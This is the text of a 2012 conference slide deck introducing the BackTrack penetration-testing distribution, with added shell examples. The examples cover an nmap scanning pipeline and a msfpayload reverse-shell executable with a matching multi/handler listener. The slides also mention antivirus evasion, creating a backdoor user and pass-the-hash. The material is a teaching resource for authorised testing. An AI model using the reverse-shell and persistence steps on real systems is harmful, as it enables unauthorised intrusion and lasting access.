An Introduction to - Atlantic Security Conference

An Introduction to BackTrack
Andrew Kozma
Atlantic Security Conference 2012
www.atlseccon.com
What is BackTrack?
• Based upon Ubuntu GNU/Linux Distribution
• Designed for Penetration Testing & Forensics
• Large collection of security-related tools ranging from
port scanners to password crackers
• LiveCD distribution that is bootable from DVD/USB
• Developed and maintained by the team at Offensive Security
• Current version is BackTrack 5 r2, kernel updated
02/24/12, ISO update 03/01/12
• Free and always will be!
Why do I need BackTrack?
Getting started with BackTrack
• Where to get it
– http://www.backtrack-linux.org/downloads/
• Non-persistent installation
– Write the .iso to DVD and boot from it
– Recommended: Universal USB Installer to create a bootable thumb drive
BT5 Boot Menu
• BT5 starts with networking enabled by default
• Previous versions of BackTrack did not boot with networking enabled
• If you need to be "Ninja", select BackTrack Stealth from the boot menu; it boots with networking disabled, so the machine generates no traffic until you bring an interface up yourself
Logging into BackTrack the first time
• First use
– When booting from the .iso you are automatically logged in as root
– Default username is root, default password is toor
– To launch the GUI enter startx
– *Note: this is not a persistent install (yet)
Persistent Installation
• This is optional
• As easy as clicking the Install BackTrack icon on the desktop and following the prompts
• Can be installed on the entire disk as the primary OS
• Can be installed alongside another OS in a dual-boot configuration
• Can be run as a virtual guest
Recommendations
• Now that we have a persistent installation, change the default root password: toor is the same on every BackTrack install, so anyone who can reach the box already knows it
• Also take this opportunity to fix the WICD error
• Type reboot from a terminal window
Launching the GUI
• Login with the root account
and the new password
• Enter startx to launch the
GUI
Connecting to a WIFI Network
• To connect to a wireless network, launch WICD from >Internet>WICD
• Select the WIFI network you wish to connect to and enter the appropriate security settings
• The status bar at the bottom shows the network you are connected to and your IP address
Updating BackTrack with a script
• Mad props to bl4ck5w4n for an awesome script!
• Use wget to retrieve the tarball from the internet
• Extract the tarball
• Copy the script to the /bin directory
• Make it executable
• From a terminal type bt5up and press enter
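The download-extract-copy-chmod procedure above, as an added example that is not from the talk and is not bl4ck5w4n's script. Running a freshly downloaded script as root is exactly the kind of thing a pentest box does all day, so the example adds the check a practitioner wants: the tarball's SHA-256 is compared against a hash obtained out of band before anything is extracted or installed. The URL, hash and tool name in the comments are placeholders; the offline demo at the end builds a constructed archive so the whole thing runs without network access.

```shell
#!/bin/sh
# Added example, not the talk's steps verbatim and not bl4ck5w4n's script:
# fetch a tool tarball, verify its SHA-256 against a hash obtained out of
# band, extract it, and install the executable into a bin directory.
# The URL, hash and tool name used in the comments are placeholders; the
# real bt5up location is not given here.
set -eu

# install_from_tarball TARBALL EXPECTED_SHA256 TOOLNAME DESTDIR
# Installs TOOLNAME from TARBALL into DESTDIR only if the archive hash
# matches. Returns 1 (and installs nothing) on a mismatch or missing file.
install_from_tarball() {
    tarball=$1; expected=$2; tool=$3; dest=$4
    actual=$(sha256sum "$tarball" | cut -d' ' -f1)
    if [ "$actual" != "$expected" ]; then
        echo "refusing to install: hash mismatch for $tarball (got $actual)" >&2
        return 1
    fi
    workdir=$(mktemp -d)
    tar -xzf "$tarball" -C "$workdir"
    # The script may sit at the archive root or inside a subdirectory.
    found=$(find "$workdir" -type f -name "$tool" | head -n 1)
    if [ -z "$found" ]; then
        echo "refusing to install: $tool not found in archive" >&2
        rm -rf "$workdir"
        return 1
    fi
    mkdir -p "$dest"
    cp "$found" "$dest/$tool"
    chmod 755 "$dest/$tool"
    rm -rf "$workdir"
}

# fetch_and_install URL EXPECTED_SHA256 TOOLNAME DESTDIR
# Online wrapper: download with wget, then hand off to install_from_tarball.
fetch_and_install() {
    tmp=$(mktemp)
    if ! wget -q -O "$tmp" "$1"; then
        rm -f "$tmp"; return 1
    fi
    if install_from_tarball "$tmp" "$2" "$3" "$4"; then rc=0; else rc=1; fi
    rm -f "$tmp"
    return $rc
}

# Offline demo: a constructed archive stands in for the real download.
# Real use would be: fetch_and_install "$URL" "$KNOWN_SHA256" bt5up /bin
demo=$(mktemp -d)
mkdir -p "$demo/src"
printf '#!/bin/sh\necho "updating..."\n' > "$demo/src/bt5up"
tar -czf "$demo/bt5up.tar.gz" -C "$demo/src" bt5up
known_hash=$(sha256sum "$demo/bt5up.tar.gz" | cut -d' ' -f1)
install_from_tarball "$demo/bt5up.tar.gz" "$known_hash" bt5up "$demo/bin"
sh "$demo/bin/bt5up"
```

The hash has to come from somewhere other than the same download page; if both the tarball and its hash are served from one location, an attacker who controls that location controls both.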
I have BackTrack, now what?
• Yep... this is how I felt in the beginning
• BackTrack can do some bad things...
• Be careful where you point that thing
• Even though I know how to aim it... guess what? I am still a monkey (an extremely cool bad-ass monkey with BackTrack though!)
Tools are arranged into 12 categories
• Information Gathering
• Vulnerability Assessment
• Exploitation Tools
• Privilege Escalation
• Maintaining Access
• Reverse Engineering
• RFID Tools
• Stress Testing
• Forensics
• Reporting Tools
• Services
• Miscellaneous
Tools
• The number of tools available can be intimidating
• The tools alone do not get the job done; a methodology does
• They are logically grouped based upon primary function
• Tactics and strategies (pentest methodology) decide which tool to use when
OSI Model (Attackers View)
• Knowing what to use when
• Know how each tool impacts the stack and the network
• Picking the right tool to do the job
• This is fundamental knowledge; to progress, a clear grasp of this model is highly recommended
Scanning
• The more information we gather, the greater the chance of success
• Identify live hosts
• Identify the OS
• Identify services, grab banners
• Check for vulnerabilities
• Tool of choice: NMAP
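The scanning phases above as an added example, not from the talk: a shell function that runs them as nmap invocations in order (ping sweep, then version and OS detection against only the hosts that answered, then the NSE "vuln" script category), plus a small parser for nmap's greppable output so the live hosts and open services can be handed to the next phase instead of read off the screen. The target range and the sample output written to a temporary file are constructed for illustration; the nmap commands only run if TARGET is set in the environment.

```shell
#!/bin/sh
# Added example, not from the talk: the scanning phases as nmap
# invocations, plus a parser for nmap's greppable (-oG) output so the
# live hosts and open services can be fed to the next phase.
# The target range and the sample output below are constructed.
set -eu

# live_hosts GNMAP
# Prints the address of every host nmap reported as "Status: Up".
live_hosts() {
    awk '/^Host:/ && /Status: Up/ { print $2 }' "$1"
}

# open_services GNMAP
# Prints "ip port/proto service version" for every open port. Greppable
# output lists ports after "Ports:" on the host line, separated by ", ",
# each as port/state/proto/owner/service/rpc/version.
open_services() {
    awk '/^Host:/ && /Ports:/ {
        ip = $2
        sub(/.*Ports: /, "")
        sub(/\t.*/, "")          # drop Ignored State / OS / Seq fields
        n = split($0, ports, ", ")
        for (i = 1; i <= n; i++) {
            split(ports[i], f, "/")
            if (f[2] == "open")
                print ip, f[1] "/" f[3], f[5], f[7]
        }
    }' "$1"
}

# scan_target TARGET OUTDIR
# Phase 1: live hosts (ping sweep). Phase 2: SYN scan with version
# detection (banner grab) and OS fingerprinting of those hosts only.
# Phase 3: NSE "vuln" category scripts against the same hosts.
# Only run this against hosts you are authorised to test.
scan_target() {
    target=$1; out=$2
    mkdir -p "$out"
    nmap -sn "$target" -oG "$out/01-live.gnmap"
    live_hosts "$out/01-live.gnmap" > "$out/live.txt"
    [ -s "$out/live.txt" ] || { echo "no live hosts in $target" >&2; return 0; }
    nmap -sS -sV -O -iL "$out/live.txt" \
        -oG "$out/02-services.gnmap" -oN "$out/02-services.nmap"
    nmap -sV --script vuln -iL "$out/live.txt" -oN "$out/03-vuln.nmap"
    open_services "$out/02-services.gnmap"
}

# Constructed -oG sample standing in for a real 02-services.gnmap.
sample=$(mktemp)
{
    printf 'Host: 10.0.0.5 ()\tStatus: Up\n'
    printf 'Host: 10.0.0.5 ()\tPorts: 22/open/tcp//ssh//OpenSSH 5.3p1 Debian 3ubuntu7/, 80/open/tcp//http//Apache httpd 2.2.14/, 443/filtered/tcp//https///\tIgnored State: closed (997)\tOS: Linux 2.6.X\n'
    printf 'Host: 10.0.0.6 ()\tStatus: Up\n'
    printf 'Host: 10.0.0.6 ()\tPorts: 445/open/tcp//microsoft-ds//Microsoft Windows XP microsoft-ds/\tOS: Microsoft Windows XP SP2\n'
    printf 'Host: 10.0.0.7 ()\tStatus: Down\n'
} > "$sample"

live_hosts "$sample"
open_services "$sample"
# Real run against an authorised range: TARGET=10.0.0.0/29 sh thisfile.sh
[ -z "${TARGET:-}" ] || scan_target "$TARGET" ./scan-out
```

Phase 2 and 3 are deliberately fed the live-host list rather than the original range; version detection and vuln scripts are slow and noisy, and pointing them at addresses that never answered the sweep is wasted time and wasted stealth.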
Vulnerabilities & Exploits
• Vulnerability – A flaw or weakness in a system
that can be exploited to cause a disruption in
service and/or damage
• Exploit – Software that takes advantage of a
vulnerability to escalate privileges or disrupt
service
• Overflow – An error condition that occurs when a program writes data beyond the bounds of the memory allocated for it
• Payload – The code that runs on a system after it
has been compromised
Metasploit
• Free online course from the gang at Offensive Security (Thanks guys, this is awesome!)
• Does it all... can scan, can check for vulnerabilities, can create your own payloads and can deliver them
• msfconsole is where exploits are launched and most compromised hosts (sessions) are managed
Maintaining Access
• If you can get a user to run a payload for you there is no need to go through the trouble of exploiting any software (SET – Social-Engineer Toolkit)
• Payloads can be encoded to aid in bypassing AV software
Reverse Shell
• Append O to the msfpayload command to display the available options for the selected payload
Reverse Shell
• Compile the payload into an executable
Reverse Shell
• Now that the payload is ready to go, we use multi/handler to catch the connection from a payload launched outside the Metasploit framework
Reverse Shell
• We need to tell multi/handler what payload to expect, so we configure it with the same payload, listening address and port that we used when we compiled the executable
Reverse Shell
• Now that everything is prepared, we start the listener with "exploit"
• When the executable runs on the remote host, multi/handler catches the connection and we have a reverse shell session
• What access level does Jim have?
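The whole reverse-shell procedure, as an added example that is not from the talk: the payload executable and the multi/handler resource script are generated from one set of variables, and a check confirms the handler really expects what the executable will send, since a mismatched payload, address or port is the usual reason the victim runs the file and no session ever appears. The address, port and file names are placeholders for a lab you are authorised to test in; msfpayload is only invoked if it is installed.

```shell
#!/bin/sh
# Added example, not from the talk: build the reverse-shell executable with
# msfpayload and a matching multi/handler resource file from one set of
# variables, then check that the handler expects what the executable sends.
# Address, port and file names are placeholders for an authorised lab.
set -eu

PAYLOAD=windows/meterpreter/reverse_tcp
LHOST=192.168.56.101   # the BackTrack box the victim connects back to (placeholder)
LPORT=4443             # port multi/handler listens on (placeholder)

# payload_cmd PAYLOAD LHOST LPORT OUTFILE
# Prints the msfpayload command that writes the payload as a Windows
# executable (X). Replace X with O to list the payload's options instead.
payload_cmd() {
    printf 'msfpayload %s LHOST=%s LPORT=%s X > %s\n' "$1" "$2" "$3" "$4"
}

# handler_rc PAYLOAD LHOST LPORT
# Prints an msfconsole resource script that starts exploit/multi/handler
# with the same settings, as a background job that keeps listening after
# the first session so more than one callback can be caught.
handler_rc() {
    cat <<EOF
use exploit/multi/handler
set PAYLOAD $1
set LHOST $2
set LPORT $3
set ExitOnSession false
exploit -j -z
EOF
}

# rc_matches RCFILE PAYLOAD LHOST LPORT
# Succeeds only if the resource file sets exactly these values.
rc_matches() {
    grep -qx "set PAYLOAD $2" "$1" &&
    grep -qx "set LHOST $3" "$1" &&
    grep -qx "set LPORT $4" "$1"
}

work=$(mktemp -d)
handler_rc "$PAYLOAD" "$LHOST" "$LPORT" > "$work/handler.rc"
payload_cmd "$PAYLOAD" "$LHOST" "$LPORT" "$work/payload.exe" > "$work/build-payload.sh"
rc_matches "$work/handler.rc" "$PAYLOAD" "$LHOST" "$LPORT"

# Only build the executable if Metasploit is present on this machine.
if command -v msfpayload >/dev/null 2>&1; then
    sh "$work/build-payload.sh"
fi
# Then start the listener with: msfconsole -r "$work/handler.rc"
# When a session opens: sessions -i 1, then getuid to see whose privileges
# the shell has (the "what access level does Jim have?" question).
```

Keeping ExitOnSession false with exploit -j -z means the handler stays up after the first callback; if the executable is run on more than one workstation, each one gets its own session instead of the second connection being refused.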
Moving on
• With a reverse shell connection we have the same
privilege level as Jim (Hope he is a local admin)
• Let's create a local user with our own password, just for fun
• The fun continues as we can now scan additional
hosts and services from Jim’s workstation
• What level of access does Jim have on other
workstations? (Pass the hash)
Documenting & Reporting
• This is the “work” part and it separates the
good from the decent
• You must be able to document your findings
and present them to various levels of
management
• It should include all steps taken to perform the
exploit and also include recommendations for
remediation/mitigation
• Pics or it didn’t happen…
Additional Resources
• www.offensive-security.com
• Metasploit Unleashed – Free online course
• www.backtrack-linux.org
• http://www.exploit-db.com/
• http://www.exploit-db.com/google-dorks/
• http://www.offensive-security.com/penetrationtesting-sample-report.pdf
• www.thehask.com
• Halifax Hack Lab (Speak to Travis Barlow)
Conclusion
• Have basic Unix command-line skills; try Kubuntu
• Take your time
• Pick a few tools and learn them well
• This is a continual process; you will always be learning
• You have not failed until you stop trying
• Many thanks to the team at Offensive Security for being the first educational sponsor of The Atlantic Security Conference
Questions?